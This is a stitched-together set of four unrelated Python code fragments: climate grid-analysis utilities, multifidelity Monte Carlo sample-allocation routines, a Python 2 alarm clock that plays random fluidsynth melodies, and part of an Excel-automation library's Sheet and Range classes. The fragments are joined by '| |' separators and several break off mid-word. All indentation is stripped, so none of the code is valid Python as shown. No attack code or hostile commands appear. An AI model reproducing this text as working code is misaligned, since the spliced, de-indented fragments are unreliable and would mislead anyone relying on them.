if(GridUtil.isTimeSequence(xvar) and GridUtil.isTimeSequence(yvar) and GridUtil.getTimeSet(xvar).getLength() == GridUtil.getTimeSet(yvar).getLength()):
xavg=averageOverTime(xvar,makeTimes=0)
yavg=averageOverTime(yvar,makeTimes=0)
xdev=xvar-xavg
ydev=yvar-yavg
xydevsumbyn=sumOverTime(xdev.multiply(ydev))/(GridUtil.getTimeSet(xdev).getLength()-1)
xstddev=sumOverTime(xdev**2,makeTimes=0)/(GridUtil.getTimeSet(xdev).getLength()-1)
ystddev=sumOverTime(ydev**2,makeTimes=0)/(GridUtil.getTimeSet(ydev).getLength()-1)
else:
raise VisADException("Number of timesteps for correlation should be same")
return noUnit(xydevsumbyn)/noUnit((xstddev**0.5)*(ystddev**0.5))
#######################################AREA UTILS###################################################
def areaWeights(grid):
""" Computes area weights of a grid and returns the grid with
weights at each grid.
"""
from visad import Real
areaW=createAreaField(grid)
areaSum=sum(areaW.getValues()[0])
return areaW.divide(Real(areaSum))
def xyAreaAverage(grid):
""" Computes Area Average of a grid and returns a grid with area
averaged value at all grid points.
"""
oldtype=GridUtil.getParamType(grid)
xyAavg=xsum(ysum(grid*areaWeights(grid)))
return GridUtil.setParamType(xyAavg,oldtype,0)
def deviationXY(grid):
""" Computes deviation from grid grid area average value of a grid
and returns a grid with deviation from the area averaged value.
"""
return sub(grid,xyAreaAverage(grid))
def anomalyFromTimeMeans(grid):
""" Computes deviation from time mean at each grid point.
"""
avggrid=averageOverTime(grid,1)
return grid.subtract(avggrid)
def deviationXYT(grid):
""" Computes deviation from time and spatial mean at each grid point.
"""
return deviationXY(anomalyFromTimeMeans(grid))
def computeGridAreaAverage(variable):
from ucar.unidata.util.Misc import getAverage
from visad import Real
#print GridUtil.isTimeSequence(variable)
areaW=createAreaField(variable)
sumareaW=sum(areaW.getValues()[0])
areaW=areaW.divide(Real(sumareaW))
test=variable.getSample(0).multiply(areaW)
aavg=sum(test.getValues()[0])/len(test.getValues()[0])
return aavg
def rebin(grid,newGrid):
""" Rebin or regrid a grid based on coordinates of newGrid using bilinear
interpolation
"""
from visad import Data
return GridUtil.resampleGrid(grid,GridUtil.getSpatialDomain(newGrid),Data.WEIGHTED_AVERAGE)
################################VERTICAL UTILS###########################################
def getLevels(grid):
""" A helper function to get levels values inside a grid as a list.
"""
from visad import VisADException
if GridUtil.is3D(GridUtil.getSpatialDomain(grid)):
leveldim=GridUtil.getSpatialDomain(grid).getManifoldDimension()
levels=remove_duplicates(GridUtil.getSpatialDomain(grid).getSamples()[leveldim-1])
else:
raise VisADException("No Vertical Levels Found")
return levels
def getAbsCDiff(levels):
from visad import VisADException
cdiff=levels[:]
for i,lev in zip(range(len(levels)),levels):
if i==0 :
cdiff[i]=abs(levels[i+1]-levels[i])/1.0
else:
if i==len(levels)-1:
cdiff[i]=abs(levels[i-1]-levels[i])/1.0
else:
cdiff[i]=abs(levels[i+1]-levels[i-1])/2.0
return cdiff
def verticalWeightedAvg(grid):
""" Computes a vertical coordinate weighted average of a 3D grid.
"""
from visad import Real
levels=getLevels(grid)
dlevels=getAbsCDiff(levels)
vavg=GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid,levels[len(levels)-1])).multiply(Real(0.0))
for level,dlevel in zip(levels,dlevels):
vavg=vavg+GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid, float(level)),0).multiply(Real(dlevel/sum(dlevels)))
return vavg
def verticalIntegral(grid):
""" Computes a vertical coordinate integral of a 3D grid.
"""
from visad import Real
levels=getLevels(grid)
dlevels=getAbsCDiff(levels)
vavg=GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid,levels[len(levels)-1])).multiply(Real(0.0))
for level,dlevel in zip(levels,dlevels):
vavg=vavg+GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid, float(level)),0).multiply(Real(dlevel))
return vavg
def pverticalIntegral(grid):
""" Computes a vertical coordinate integral of a 3D grid/gravity
integral( grid dp/g)
"""
from visad import Real
levels=getLevels(grid)
dlevels=getAbsCDiff(levels)
vavg=GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid,levels[len(levels)-1])).multiply(Real(0.0))
for level,dlevel in zip(levels,dlevels):
vavg=vavg+GridUtil.make2DGridFromSlice(GridUtil.sliceAtLevel(grid, float(level)),0).multiply(Real(dlevel/9.8))
return vavg
def ddz(grid):
""" Computes a vertical coordinate derivative of grid specifed.
"""
from visad import VisADException
#doesnt work well to raise exception for case when one level is present,
#in that case does derivative for longitude
if (GridUtil.is3D(GridUtil.getSpatialDomain(grid))):
leveldim=GridUtil.getSpatialDomain(grid).getManifoldDimension()
else:
raise VisADException("Not a 3D Spatial Grid")
return GridMath.partial(grid,(leveldim-1))
def smooth3d(grid,smooth_fn,smooth_val=None):
""" Returns a smoothend | |
nsample_ratios = standardize_sample_ratios(
nhf_samples, nsample_ratios)
gamma = get_variance_reduction(get_rsquared_mfmc, cov, nsample_ratios)
log10_variance = np.log10(gamma)+np.log10(cov[0, 0])-np.log10(
nhf_samples)
return nhf_samples, np.atleast_1d(nsample_ratios), log10_variance
def allocate_samples_mlmc(cov, costs, target_cost, standardize=True):
r"""
Determine the samples to be allocated to each model when using MLMC
Parameters
----------
cov : np.ndarray (nmodels,nmodels)
The covariance C between each of the models. The highest fidelity
model is the first model, i.e its variance is cov[0,0]
costs : np.ndarray (nmodels)
The relative costs of evaluating each model
target_cost : float
The total cost budget
standardize : boolean
If true make sure that nhf_samples is an integer and that
nhf_samples*nsamples_ratios are integers. False is only ever used
for testing.
Returns
-------
nhf_samples : integer
The number of samples of the high fidelity model
nsample_ratios : np.ndarray (nmodels-1)
The sample ratios r used to specify the number of samples of the
lower fidelity models, e.g. N_i = r_i*nhf_samples,
i=1,...,nmodels-1. For model i>0 nsample_ratio*nhf_samples equals
the number of samples in the two different discrepancies involving
the ith model.
log10_variance : float
The base 10 logarithm of the variance of the estimator
"""
nmodels = cov.shape[0]
sum1 = 0.0
nsamples = []
vardeltas = []
for ii in range(nmodels-1):
# compute the variance of the discrepancy
vardelta = cov[ii, ii] + cov[ii+1, ii+1] - 2*cov[ii, ii+1]
vardeltas.append(vardelta)
# compute the variance * cost
vc = vardelta * (costs[ii] + costs[ii+1])
# compute the unnormalized number of samples\
# these values will be normalized by lamda later
nsamp = np.sqrt(vardelta / (costs[ii] + costs[ii+1]))
nsamples.append(nsamp)
sum1 += np.sqrt(vc)
I = np.argsort(vardeltas)
#assert np.allclose(I,np.arange(nmodels-1))
# compute information for lowest fidelity model
v = cov[nmodels-1, nmodels-1]
c = costs[nmodels-1]
nsamples.append(np.sqrt(v/c))
sum1 += np.sqrt(v*c)
# compute the ML estimator variance from the target cost
variance = sum1**2 / target_cost
# compute the lagrangian parameter
sqrt_lamda = sum1/variance
# compute the number of samples allocated to resolving each
# discrepancy.
nl = [sqrt_lamda * n for n in nsamples]
# compute the number of samples allocated to each model. For
# all but the highest fidelity model we need to collect samples
# from two discrepancies.
nhf_samples = nl[0]
nsample_ratios = []
for ii in range(1, nmodels-1):
nsample_ratios.append((nl[ii-1] + nl[ii])/nl[0])
if nmodels > 1:
nsample_ratios.append((nl[-2]+nl[-1])/nl[0])
nsample_ratios = np.asarray(nsample_ratios)
if standardize:
nhf_samples = max(nhf_samples, 1)
nhf_samples, nsample_ratios = standardize_sample_ratios(
nhf_samples, nsample_ratios)
gamma = get_variance_reduction(get_rsquared_mlmc, cov, nsample_ratios)
log10_variance = np.log10(gamma)+np.log10(cov[0, 0])-np.log10(
nhf_samples)
# print(log10_variance)
if np.isnan(log10_variance):
raise Exception('MLMC variance is NAN')
return nhf_samples, np.atleast_1d(nsample_ratios), log10_variance
def get_lagrange_multiplier_mlmc(cov, costs, nhf_samples):
r"""
Given an optimal sample allocation recover the optimal value of the
Lagrange multiplier. This is only used for testing
"""
ii = 0 # 0th discrepancy
var_delta = cov[ii, ii] + cov[ii+1, ii+1] - 2*cov[ii, ii+1]
cost_delta = (costs[ii] + costs[ii+1])
lagrange_mult = nhf_samples**2/(var_delta/cost_delta)
return lagrange_mult
def get_discrepancy_covariances_IS(cov, nsample_ratios, pkg=np):
r"""
Get the covariances of the discrepancies :math:`\delta`
between each low-fidelity model and its estimated mean when the same
:math:`N` samples are used to compute the covariance between each models
and :math:`N-r_\alpha` samples are allocated to
estimate the low-fidelity means, and each of these sets are drawn
independently from one another.
Parameters
----------
cov : np.ndarray (nmodels,nmodels)
The estimated covariance between each model.
nsample_ratios : iterable (nmodels-1)
The sample ratioss :math:`r_\alpha>1` for each low-fidelity model
pkg : package (optional)
A python package (numpy or torch) used to store the covariances.
Results
-------
CF : np.ndarray (nmodels-1,nmodels-1)
The matrix of covariances between the discrepancies :math:`\delta`
cf : np.ndarray (nmodels-1)
The vector of covariances between the discrepancies and the
high-fidelity model.
"""
nmodels = cov.shape[0]
F = pkg.zeros((nmodels-1, nmodels-1), dtype=pkg.double)
for ii in range(nmodels-1):
F[ii, ii] = (nsample_ratios[ii]-1)/nsample_ratios[ii]
for jj in range(ii+1, nmodels-1):
F[ii, jj] = (nsample_ratios[ii]-1)/nsample_ratios[ii] * (
nsample_ratios[jj]-1)/nsample_ratios[jj]
F[jj, ii] = F[ii, jj]
CF = cov[1:, 1:] * F
cf = pkg.diag(F) * cov[1:, 0]
return CF, cf
def get_discrepancy_covariances_MF(cov, nsample_ratios, pkg=np):
r"""
Get the covariances of the discrepancies :math:`\delta`
between each low-fidelity model and its estimated mean using the MFMC
sampling strategy.
Parameters
----------
cov : np.ndarray (nmodels,nmodels)
The estimated covariance between each model.
nsample_ratios : iterable (nmodels-1)
The sample ratioss :math:`r_\alpha>1` for each low-fidelity model
pkg : package (optional)
A python package (numpy or torch) used to store the covariances.
Results
-------
CF : np.ndarray (nmodels-1,nmodels-1)
The matrix of covariances between the discrepancies :math:`\delta`
cf : np.ndarray (nmodels-1)
The vector of covariances between the discrepancies and the
high-fidelity model.
"""
nmodels = cov.shape[0]
F = pkg.zeros((nmodels-1, nmodels-1), dtype=pkg.double)
for ii in range(nmodels-1):
for jj in range(nmodels-1):
rr = min(nsample_ratios[ii], nsample_ratios[jj])
F[ii, jj] = (rr - 1) / rr
CF = cov[1:, 1:] * F
cf = pkg.diag(F) * cov[1:, 0]
return CF, cf
def get_discrepancy_covariances_KL(cov, nsample_ratios, K, L, pkg=np):
r"""
Get the covariances of the discrepancies :math:`\delta`
between each low-fidelity model and its estimated mean using the MFMC
sampling strategy and the ACV KL estimator.
The ACV-KL estimator partitions all of the control variates into two
groups; the first K variables form a K -level approximate control
variate, and the last :math:`M-K` variables are used to reduce the variance
of estimating :math:`\mu_L` some :math:`L \le K` . The resulting estimator
accelerates convergence to OCV-K , and L provides a degree of freedom
for targeting a control variate level that contributes the greatest to
the estimator variance.
Parameters
----------
cov : np.ndarray (nmodels,nmodels)
The estimated covariance between each model.
nsample_ratios : iterable (nmodels-1)
The sample ratioss :math:`r_\alpha>1` for each low-fidelity model
K : integer (K<=nmodels-1)
The number of effective control variates.
L : integer (1<=L<=K+1)
The id of the models whose mean is being targeted by the
remaining nmodels-K low fidelity models.
pkg : package (optional)
A python package (numpy or torch) used to store the covariances.
Results
-------
CF : np.ndarray (nmodels-1,nmodels-1)
The matrix of covariances between the discrepancies :math:`\delta`
cf : np.ndarray (nmodels-1)
The vector of covariances between the discrepancies and the
high-fidelity model.
"""
nmodels = cov.shape[0]
assert L <= K+1 and L >= 1 and K < nmodels
K, L = K-1, L-1
F = pkg.zeros((nmodels-1, nmodels-1), dtype=pkg.double)
rs = nsample_ratios
for ii in range(nmodels-1):
if ii <= K:
F[ii, ii] = (rs[ii]-1)/(rs[ii]+1e-20)
else:
F[ii, ii] = (rs[ii]-rs[L])/(rs[ii]*rs[L])
for jj in range(ii+1, nmodels-1):
if (ii <= K) and (jj <= K):
ri = min(rs[ii], rs[jj])
F[ii, jj] = (ri - 1) / (ri + 1e-20)
elif (jj > K) and (ii > K):
ri = min(rs[ii], rs[jj])
t1 = (rs[ii]-rs[L])*(rs[jj]-rs[L])/(rs[ii]*rs[jj]*rs[L]
+ 1e-20)
t2 = (ri - rs[L]) / (rs[ii] * rs[jj] + 1e-20)
F[ii, jj] = t1 + t2
elif (ii > L) and (ii <= K) and (jj > K):
F[ii, jj] = (rs[ii] - rs[L]) / (rs[ii] * rs[L] + 1e-20)
elif (jj > L) and (jj <= K) and (ii > K):
F[ii, jj] = (rs[jj] - rs[L]) / (rs[jj] * rs[L] + 1e-20)
else:
F[ii, jj] = 0.0
F[jj, ii] = F[ii, jj]
CF = cov[1:, 1:] * F
cf = pkg.diag(F) * cov[1:, 0]
return CF, cf
def get_control_variate_weights(cov):
r"""
Get the weights used by the control variate estimator with known low
fidelity means.
Parameters
----------
cov : np.ndarray (nmodels,nmodels)
The estimated covariance between each model.
Returns
-------
weights : np.ndarray (nmodels-1)
The control variate weights
"""
weights = -np.linalg.solve(cov[1:, 1:], cov[0, 1:])
return weights
def get_approximate_control_variate_weights(cov, nsample_ratios,
get_discrepancy_covariances):
r"""
Get the weights used by the approximate control variate estimator.
Parameters
----------
cov : np.ndarray (nmodels,nmodels)
The estimated covariance between each model.
nsample_ratios : iterable (nmodels-1)
The sample ratioss :math:`r_\alpha>1` for each low-fidelity model
get_discrepancy_covariances : callable
Function with signature get_discrepancy_covariances(cov,nsample_ratios)
which returns the covariances between the discrepancies betweem the
low-fidelity models and their approximated mean.
Returns
-------
weights : np.ndarray (nmodels-1)
The control variate | |
'''
MIT License
Copyright (c) 2016 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
'''
capriccio.py
Created by <NAME> on 2016-08-12.
https://yuhuili.com
https://github.com/yuhuili
'''
import pyglet
import threading
import time
import datetime
import sys, getopt
import random
from mingus.midi import fluidsynth
from os.path import isfile
class Alarm(object):
'''
A simple alarm clock written in Python.
Example:
import capriccio
t = datetime.datetime.now() + datetime.timedelta(seconds=10)
a = Alarm(t, "alarm.mp3")
# The above plays alarm.mp3, or you could use Alarm(t, 0) to let capriccio generate note sequences in real time given an instrument number.
# Make sure a is retained, or else when the main thread ends, this alarm will also be released.
a.destroy() # Stop the alarm clock.
'''
def __init__(self, timestamp, tune, is_random = False):
'''
Initialize an alarm clock.
Args:
timestamp (datetime): The timestamp on which the alarm will sound.
tune (str): The filename of the alarm audio file, or if is_random==True, the instrument number.
is_random (bool): if sound generator should be used instead of an audio file.
'''
self.should_stop = True
now = datetime.datetime.now()
delay = (timestamp - now).total_seconds()
if delay > 0:
print "Scheduling an alarm clock at %s, which is in %.1f seconds." % (timestamp, delay)
else:
print "Scheduling an alarm clock at %s, which is %.1f seconds earlier than current time %s. This alarm is not set." % (timestamp, delay, now)
return
if is_random == False:
self.alarm_thread = threading.Timer(delay, self.__play_sound__, (tune,))
else:
self.alarm_thread = threading.Timer(delay, self.__generate_sound__, (int(tune),))
self.alarm_thread.start()
def destroy(self):
'''
Stop the alarm clock, whether or not it has actually occured
'''
self.should_stop = True
if hasattr(self, 'p'):
self.p.delete()
if hasattr(self, 'sg'):
self.sg.stop()
self.alarm_thread.cancel()
self.alarm_thread.join()
def __generate_sound__(self, instrument):
'''
Play generated note sequences on a given instrument.
Args:
instrument (int): The instrument used by SoundGen. (Not identical to GM 1 Sound Set)
'''
self.sg = SoundGen(instrument)
self.sg.play()
def __play_sound__(self, tune):
'''
Play the audio file continuously, until the alarm is cancelled by calling destroy()
Args:
tune (str): The filename of the alarm audio file.
'''
music = pyglet.media.load(tune)
sg = pyglet.media.SourceGroup(music.audio_format, None)
sg.loop = True
sg.queue(music)
self.p = pyglet.media.Player()
self.p.queue(sg)
self.p.play()
v=float(0)
while v<1 and self.should_stop == False:
v+=0.05
self.p.volume = v;
time.sleep(0.2)
class SoundGen(object):
'''
Synthesize note sequences with mingus and fluidsynth.
'''
# L = low, H = high
kNoteNone = int(-1)
kNoteLB = int(59)
kNoteC = int(60)
kNoteCs = kNoteDf = int(61)
kNoteD = int(62)
kNoteDs = kNoteEf = int(63)
kNoteE = int(64)
kNoteF = int(65)
kNoteFs = kNoteGf = int(66)
kNoteG = int(67)
kNoteGs = kNoteAf = int(68)
kNoteA = int(69)
kNoteAs = kNoteBf = int(70)
kNoteB = int(71)
kNoteHC = int(72)
kNoteHCs = kNoteHDf = int(73)
kNoteHD = int(74)
kNoteHDs = kNoteHEf = int(75)
kNoteHE = int(76)
kSameNoteMultiplier = 3
OneBeatLength = 0.5 # 1 beat is _ seconds
def __init__(self, instrument = 0):
self.should_stop = False
if instrument == 1: # Pipe: Pan Flute
self.__set_instrument__(75, 0.5)
elif instrument == 2: # Brass: French Horn
self.__set_instrument__(60, 0.3)
elif instrument == 3: # Synth Lead: Lead 8 (bass + lead)
self.__set_instrument__(87, 0.2)
elif instrument == 4: # Synth Effects: FX 3 (crystal)
self.__set_instrument__(98, 0.3)
elif instrument == 5: # Percussive: Steel Drums
self.__set_instrument__(114, 0.2)
elif instrument == 6: # Sound Effects: Bird Tweet (Calm but prob no a good wake up alarm)
self.__set_instrument__(123, 0.5)
elif instrument == 7: # Sound Effects: Gunshot (ANNOYING~)
self.__set_instrument__(127, 0.2)
elif instrument == 8: # Ensemble: String Ensemble 2
self.__set_instrument__(49, 0.4)
elif instrument == 9: # Pipe: Piccolo
self.__set_instrument__(72, 0.4)
else: # Default: Piano: Electric Grand Piano
self.__set_instrument__(2, 0.3)
def __set_instrument__(self, instrument, beat_length):
self.instrument = instrument
self.OneBeatLength = beat_length
def play(self):
fluidsynth.init('/usr/share/sounds/sf2/FluidR3_GM.sf2','alsa')
fluidsynth.set_instrument(0, self.instrument) # Use channel 0
self.previous = int(SoundGen.kNoteNone) # Previously played note
self.shift = random.randint(-10, 5) # Allow the key to be shifted
beat_tracker = int(0) # 4/4 time.
while self.should_stop == False:
v = random.randint(65,75)
if beat_tracker % 8 == 0:
# First beat, strong
v = random.randint(85,95)
elif (beat_tracker - 4) % 8 == 0:
# Third beat, semi-strong
v = random.randint(75,85)
elif beat_tracker % 2 == 1:
# Off-beat, very soft
v = random.randint(55,65)
# Random note length
possible_lengths = [4] + [2] * 10 + [1] * 4 # 4 is 2 beats, 2 is 1 beat, 1 is half-beat
if beat_tracker % 2 == 1: # avoid non-half-beat if currently in half-beat
possible_lengths += [1] * 20 # Add weight to half-beat
length = random.choice(possible_lengths)
beat_tracker+=length
if self.previous != SoundGen.kNoteNone:
fluidsynth.stop_Note(self.previous+self.shift, 0)
self.previous = SoundGen.__next_note__(self.previous)
fluidsynth.play_Note(self.previous+self.shift,0,v);
time.sleep(length * self.OneBeatLength)
def stop(self):
self.should_stop = True;
if self.previous != SoundGen.kNoteNone: # Won't actually kill SoundGen just yet, but at least will stop the sound instantly.
fluidsynth.stop_Note(self.previous+self.shift, 0)
@staticmethod
def __next_note__(previous):
# I know, tons of magic numbers and so difficult to read. Will fix.
if (previous == SoundGen.kNoteNone):
choices = [SoundGen.kNoteC, SoundGen.kNoteD, SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteA, SoundGen.kNoteB, SoundGen.kNoteC]
else:
if (previous == SoundGen.kNoteLB):
choices = [SoundGen.kNoteC] * 10 + [SoundGen.kNoteD] + [SoundGen.kNoteG]
elif (previous == SoundGen.kNoteC):
choices = [SoundGen.kNoteC, SoundGen.kNoteD, SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG] + [SoundGen.kNoteE] * 2 + [SoundGen.kNoteG] * 3
elif (previous == SoundGen.kNoteD):
choices = [SoundGen.kNoteC, SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteA] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteC, SoundGen.kNoteG] * 2 + [SoundGen.kNoteD]
elif (previous == SoundGen.kNoteE):
choices = [SoundGen.kNoteC, SoundGen.kNoteD, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteHC] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteC] * 2 + [SoundGen.kNoteG] * 2 + [SoundGen.kNoteE]
elif (previous == SoundGen.kNoteF):
choices = [SoundGen.kNoteC, SoundGen.kNoteD, SoundGen.kNoteE, SoundGen.kNoteG, SoundGen.kNoteA, SoundGen.kNoteHC] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteF]
elif (previous == SoundGen.kNoteG):
choices = [SoundGen.kNoteC, SoundGen.kNoteD, SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteA, SoundGen.kNoteB, SoundGen.kNoteHC, SoundGen.kNoteHD, SoundGen.kNoteHE] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteC] * 2 + [SoundGen.kNoteE] * 2 + [SoundGen.kNoteG]
elif (previous == SoundGen.kNoteA):
choices = [SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteB, SoundGen.kNoteHC, SoundGen.kNoteHD, SoundGen.kNoteHE] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteHC] * 2 + [SoundGen.kNoteA]
elif (previous == SoundGen.kNoteB):
choices = [SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteA, SoundGen.kNoteHC, SoundGen.kNoteHD] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteG] * 2 + [SoundGen.kNoteHC] * 2 + [SoundGen.kNoteB]
elif (previous == SoundGen.kNoteHC):
choices = [SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteA, SoundGen.kNoteB, SoundGen.kNoteHD, SoundGen.kNoteHE] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteG] * 3 + [SoundGen.kNoteE] * 3 + [SoundGen.kNoteHC]
elif (previous == SoundGen.kNoteHD):
choices = [SoundGen.kNoteG, SoundGen.kNoteB, SoundGen.kNoteHC, SoundGen.kNoteHE] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteB] * 2 + [SoundGen.kNoteG] * 2 + [SoundGen.kNoteHD]
elif (previous == SoundGen.kNoteHE):
choices = [SoundGen.kNoteG, SoundGen.kNoteHC] * SoundGen.kSameNoteMultiplier * 3 + [SoundGen.kNoteHC] * 2 + [SoundGen.kNoteG] * 2 + [SoundGen.kNoteHE]
return random.choice(choices)
def main(argv):
try:
opts, args = getopt.getopt(argv,"hd:t:i:",["delay=","tune=","instrument="])
except getopt.GetoptError:
print_usage()
sys.exit(1)
for opt, arg in opts:
if opt == "-h":
print_usage()
sys.exit(0)
elif opt in ("-d", "--delay"):
try:
float(arg)
except ValueError:
print "Illegal delay value. Expecting a positive float value, got %s" % arg
sys.exit(3)
if float(arg)<0:
print "Illegal delay value. Expecting a positive float value, got %s" % arg
sys.exit(4)
d = datetime.datetime.now()+datetime.timedelta(seconds=float(arg))
elif opt in ("-t", "--tune"):
if not isfile(arg):
print "Tune file %s does not exist." % arg
sys.exit(5)
t = arg
elif opt | |
xlplatform.get_worksheet_name(self.xl_sheet)
@name.setter
def name(self, value):
xlplatform.set_worksheet_name(self.xl_sheet, value)
@property
def index(self):
"""Returns the index of the Sheet."""
return xlplatform.get_worksheet_index(self.xl_sheet)
@classmethod
def active(cls, wkb=None):
"""Returns the active Sheet. Use like so: ``Sheet.active()``"""
xl_workbook = Workbook.get_xl_workbook(wkb)
return cls(xlplatform.get_worksheet_name(xlplatform.get_active_sheet(xl_workbook)), wkb)
@classmethod
def add(cls, name=None, before=None, after=None, wkb=None):
"""
.. versionadded:: 0.2.3
Creates a new worksheet: the new worksheet becomes the active sheet. If neither ``before`` nor
``after`` is specified, the new Sheet will be placed at the end.
Arguments
---------
name : str, default None
Sheet name, defaults to Excel standard name
before : str or int, default None
Sheet name or index
after : str or int, default None
Sheet name or index
Returns
-------
Sheet object
Examples
--------
>>> Sheet.add() # Place at end with default name
>>> Sheet.add('NewSheet', before='Sheet1') # Include name and position
>>> new_sheet = Sheet.add(after=3)
>>> new_sheet.index
4
"""
xl_workbook = Workbook.get_xl_workbook(wkb)
if before is None and after is None:
after = Sheet(Sheet.count())
elif before:
before = Sheet(before, wkb=wkb)
elif after:
after = Sheet(after, wkb=wkb)
if name:
if name in [i.name.lower() for i in Sheet.all(wkb=wkb)]:
raise Exception('That sheet name is already in use.')
else:
xl_sheet = xlplatform.add_sheet(xl_workbook, before, after)
xlplatform.set_worksheet_name(xl_sheet, name)
return cls(name, wkb)
else:
xl_sheet = xlplatform.add_sheet(xl_workbook, before, after)
return cls(xlplatform.get_worksheet_name(xl_sheet), wkb)
@staticmethod
def count(wkb=None):
"""
.. versionadded:: 0.2.3
Counts the number of Sheets.
Keyword Arguments
-----------------
wkb : Workbook object, default Workbook.current()
Defaults to the Workbook that was instantiated last or set via ``Workbook.set_current()``.
Examples
--------
>>> Sheet.count()
3
"""
xl_workbook = Workbook.get_xl_workbook(wkb)
return xlplatform.count_worksheets(xl_workbook)
@staticmethod
def all(wkb=None):
"""
.. versionadded:: 0.2.3
Returns a list with all Sheet objects.
Keyword Arguments
-----------------
wkb : Workbook object, default Workbook.current()
Defaults to the Workbook that was instantiated last or set via ``Workbook.set_current()``.
Examples
--------
>>> Sheet.all()
[<Sheet 'Sheet1' of Workbook 'Book1'>, <Sheet 'Sheet2' of Workbook 'Book1'>]
>>> [i.name.lower() for i in Sheet.all()]
['sheet1', 'sheet2']
>>> [i.autofit() for i in Sheet.all()]
"""
xl_workbook = Workbook.get_xl_workbook(wkb)
sheet_list = []
for i in range(1, xlplatform.count_worksheets(xl_workbook) + 1):
sheet_list.append(Sheet(i, wkb=wkb))
return sheet_list
def __repr__(self):
return "<Sheet '{0}' of Workbook '{1}'>".format(self.name, xlplatform.get_workbook_name(self.xl_workbook))
class Range(object):
"""
A Range object can be created with the following arguments::
Range('A1') Range('Sheet1', 'A1') Range(1, 'A1')
Range('A1:C3') Range('Sheet1', 'A1:C3') Range(1, 'A1:C3')
Range((1,2)) Range('Sheet1, (1,2)) Range(1, (1,2))
Range((1,1), (3,3)) Range('Sheet1', (1,1), (3,3)) Range(1, (1,1), (3,3))
Range('NamedRange') Range('Sheet1', 'NamedRange') Range(1, 'NamedRange')
If no worksheet name is provided as first argument (as name or index),
it will take the Range from the active sheet.
You usually want to go for ``Range(...).value`` to get the values (as list of lists).
Arguments
---------
*args :
Definition of sheet (optional) and Range in the above described combinations.
Keyword Arguments
-----------------
asarray : boolean, default False
Returns a NumPy array (atleast_1d) where empty cells are transformed into nan.
index : boolean, default True
Includes the index when setting a Pandas DataFrame or Series.
header : boolean, default True
Includes the column headers when setting a Pandas DataFrame.
atleast_2d : boolean, default False
Returns 2d lists/arrays even if the Range is a Row or Column.
wkb : Workbook object, default Workbook.current()
Defaults to the Workbook that was instantiated last or set via `Workbook.set_current()``.
"""
def __init__(self, *args, **kwargs):
# Arguments
if len(args) == 1 and isinstance(args[0], string_types):
sheet_name_or_index = None
range_address = args[0]
elif len(args) == 1 and isinstance(args[0], tuple):
sheet_name_or_index = None
range_address = None
self.row1 = args[0][0]
self.col1 = args[0][1]
self.row2 = self.row1
self.col2 = self.col1
elif (len(args) == 2
and isinstance(args[0], (numbers.Number, string_types))
and isinstance(args[1], string_types)):
sheet_name_or_index = args[0]
range_address = args[1]
elif (len(args) == 2
and isinstance(args[0], (numbers.Number, string_types))
and isinstance(args[1], tuple)):
sheet_name_or_index = args[0]
range_address = None
self.row1 = args[1][0]
self.col1 = args[1][1]
self.row2 = self.row1
self.col2 = self.col1
elif len(args) == 2 and isinstance(args[0], tuple):
sheet_name_or_index = None
range_address = None
self.row1 = args[0][0]
self.col1 = args[0][1]
self.row2 = args[1][0]
self.col2 = args[1][1]
elif len(args) == 3:
sheet_name_or_index = args[0]
range_address = None
self.row1 = args[1][0]
self.col1 = args[1][1]
self.row2 = args[2][0]
self.col2 = args[2][1]
# Keyword Arguments
self.kwargs = kwargs
self.workbook = kwargs.get('wkb', None)
if self.workbook is None and xlplatform.get_xl_workbook_current() is None:
raise NameError('You must first instantiate a Workbook object.')
elif self.workbook is None:
self.xl_workbook = xlplatform.get_xl_workbook_current()
else:
self.xl_workbook = self.workbook.xl_workbook
self.index = kwargs.get('index', True) # Set DataFrame with index
self.header = kwargs.get('header', True) # Set DataFrame with header
self.asarray = kwargs.get('asarray', False) # Return Data as NumPy Array
self.strict = kwargs.get('strict', False) # Stop table/horizontal/vertical at empty cells that contain formulas
self.atleast_2d = kwargs.get('atleast_2d', False) # Force data to be list of list or a 2d numpy array
# Get sheet
if sheet_name_or_index:
self.xl_sheet = xlplatform.get_worksheet(self.xl_workbook, sheet_name_or_index)
else:
self.xl_sheet = xlplatform.get_active_sheet(self.xl_workbook)
# Get xl_range object
if range_address:
self.row1 = xlplatform.get_first_row(self.xl_sheet, range_address)
